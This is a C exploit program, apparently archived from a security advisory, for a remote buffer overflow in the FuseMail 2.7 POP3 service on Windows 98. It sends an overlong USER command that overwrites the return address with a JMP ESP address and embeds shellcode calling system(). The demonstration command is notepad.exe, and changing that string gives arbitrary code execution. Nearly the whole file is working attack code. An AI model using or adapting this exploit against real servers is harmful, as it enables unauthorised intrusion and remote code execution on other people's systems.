// source: https://www.securityfocus.com/bid/634/info
There is a buffer overflow in the FuseMail POP service (long USER,PASS) that may allow an intruder to execute arbitrary code on the target server.
FuseMail 2.7
/*=============================================================================
FuseMail Version 2.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 1159
#define RETADR 1074
#define FTP_PORT 110
#define JMP_ESP 0xbff7a027
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
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